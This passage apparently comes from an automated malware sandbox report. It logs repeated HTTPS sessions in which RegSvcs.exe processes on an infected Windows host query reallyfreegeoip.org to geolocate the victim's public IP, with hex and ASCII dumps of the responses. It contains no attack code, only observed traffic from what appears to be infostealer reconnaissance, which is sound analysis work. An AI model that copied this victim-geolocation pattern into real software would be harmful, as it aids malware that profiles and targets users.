                                          2025-01-02 19:19:47 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          2 | 192.168.2.5 | 49731 | 188.114.97.34 | 443 | 7276 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:48 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:48 UTC | 855 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:48 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160378
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=au10UL1WxPBfE3c7jwETfd1wJacb0Bvz6xPt%2F6mbpxeoq0%2FmdkJIu0KmSMdhq5HkMKBr6g20Bom77VIQeu17L6KDoiBgRfPWWE6MQ%2FF7QwblSok1Sg2y5Zel5JeuATZgYZKt7QYB"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a524de5438c-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=2121&min_rtt=2103&rtt_var=825&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1298932&cwnd=245&unsent_bytes=0&cid=76e88e5fe5daafc9&ts=257&x=0"
                                          2025-01-02 19:19:48 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          3 | 192.168.2.5 | 49733 | 188.114.97.34 | 443 | 7276 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:49 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:50 UTC | 861 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:50 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160379
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cFeEHFsUB8HO0%2B%2BG5WoLAxRyRzgSQpZT0yrilq1%2F7M9aqA5%2FoEQYaJ%2BY17T4SdM%2FV1f0x4tnp7J9tQRopGoeoYjeTdUvzLFZLu48Uz8mTGrZPET3IR7islqadEFwqvDnvzO2PwhC"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a599ae82395-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1985&rtt_var=761&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1423695&cwnd=139&unsent_bytes=0&cid=5708d996f42df4d8&ts=154&x=0"
                                          2025-01-02 19:19:50 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          4 | 192.168.2.5 | 49737 | 188.114.97.34 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:50 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:50 UTC | 863 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:50 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160379
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Up5l%2BpL9%2FIlUNsBDxxxmRwMcT0GQoloboFbu4C6%2B7spNQd%2B6Un0laUa%2FMLAhWRj9wrZJBfJdihScDv1sPTXJ0%2BlCAJ4Z0u2iCFfbSJFTziESXtoXgLZct0cIcU%2F1mFanPQbhSzmh"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a5e99e37cee-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=2035&min_rtt=2035&rtt_var=1017&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=266886&cwnd=176&unsent_bytes=0&cid=bd357924105f57ba&ts=191&x=0"
                                          2025-01-02 19:19:50 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          5 | 192.168.2.5 | 49738 | 188.114.97.34 | 443 | 7276 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:51 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:51 UTC | 860 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:51 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160380
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8NZX9t0jD81WwXQWw90GHcERcTP7aU%2F6OURYrMYPfuk89QHzx3VjzLqe1J%2FwktLGzLlFYpIfzAxGJdfoGJrIuVuj1ETH%2Bkel2UrbP6NLmh1Aiy1Gs1dR0hampc%2B13YniTEizX8Y4"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a617d0341f2-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=59335&min_rtt=1831&rtt_var=34773&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1594756&cwnd=231&unsent_bytes=0&cid=29c50adf0f82dfb6&ts=159&x=0"
                                          2025-01-02 19:19:51 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          6 | 192.168.2.5 | 49744 | 188.114.97.34 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:51 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2025-01-02 19:19:51 UTC | 865 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:51 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160380
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3g8GrpXYIA9nqNCNrb0C2m2tClmRtLUN7Dx6Zqa%2BsZZP%2B9zGv46GgQdAGz1xLAld9IIwByD0c%2FHz7wiAV3%2FGlEvQouC%2FykXKHGbsAZsLL9Rs%2FTWKCXQnEwu52FXY0TsY%2BuMtcuu%2B"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a64191642cb-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1716&rtt_var=647&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1685912&cwnd=163&unsent_bytes=0&cid=d774e1631dec4e68&ts=158&x=0"
                                          2025-01-02 19:19:51 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          7 | 192.168.2.5 | 49752 | 188.114.97.34 | 443 | 7276 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:52 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          2025-01-02 19:19:52 UTC | 857 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:52 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160381
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ItONndM6EqK8Q5frN9y8w06ax4merGCewX%2BhAl4RbnP%2Fhgs%2FYL1V5yjK8CUk7xfxIDFUwk2erT4JOgBeOo2xvk1DamjMlAvf8tkEaOOUGyYeRutWCC3Lw7Hbxq%2FIK9Rwa9GhViQT"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a69df0841e3-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1972&min_rtt=1844&rtt_var=783&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1583514&cwnd=218&unsent_bytes=0&cid=04b90e8e088a3926&ts=182&x=0"
                                          2025-01-02 19:19:52 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          8 | 192.168.2.5 | 49753 | 188.114.97.3 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:52 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:52 UTC | 853 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:52 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160382
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9hDFufYcvlB99aT6B6RnDmbBlXSQ%2F1xDC91cB7wbt2EHwa0aMxQCfQcauKDH2Uxm5vGOu%2Bh44uZysf9rzX2jNiOg0jsl6Ngj1ue3h5aTAxfqYLWfuCUsWJ8vYRTBnRTWMnFiXwW2"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a6b9ec24314-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=2402&min_rtt=2325&rtt_var=1027&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=990502&cwnd=188&unsent_bytes=0&cid=8765965ad1b73d35&ts=155&x=0"
                                          2025-01-02 19:19:52 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          9 | 192.168.2.5 | 49762 | 188.114.97.3 | 443 | 7276 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:53 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:53 UTC | 865 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:53 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160382
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qmp%2F77QN3k%2F0r%2FIKmJgQboIGl7bFxO%2BVJLMIIgQWVguo1zI8%2FBFsAhjXwWxopvh1vCvsIuJ%2FZvwY%2BVstASMoo3Ykve4hOuZUrQPBbHfiG4EMjIkZQHYA81nqW3H2WnkP%2BH3Efxej"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a70ffbf7283-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1976&min_rtt=1968&rtt_var=754&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1434889&cwnd=244&unsent_bytes=0&cid=2f257e92fd04dcd9&ts=149&x=0"
                                          2025-01-02 19:19:53 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          10 | 192.168.2.5 | 49767 | 188.114.97.3 | 443 | 7620 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2025-01-02 19:19:53 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                          Host: reallyfreegeoip.org
                                          Connection: Keep-Alive
                                          2025-01-02 19:19:54 UTC | 851 | IN | HTTP/1.1 200 OK
                                          Date: Thu, 02 Jan 2025 19:19:54 GMT
                                          Content-Type: text/xml
                                          Content-Length: 362
                                          Connection: close
                                          Age: 1160383
                                          Cache-Control: max-age=31536000
                                          cf-cache-status: HIT
                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhJnXmm8gjEfcI8AkR6Dw9VLJMPk7YJC7Gfz4aZVMX3Hgt%2B6OyNHHZPeczBp1wwtE0XbQi1Q2DaHKwABmb0Iijop2GOHQePTNAidFT0z42djhwg2BDDJyI2J3txlYWieYdUzfT0W"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 8fbd1a72b8ba4286-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1767&rtt_var=687&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1652518&cwnd=252&unsent_bytes=0&cid=5bf65f1fb26c9464&ts=161&x=0"
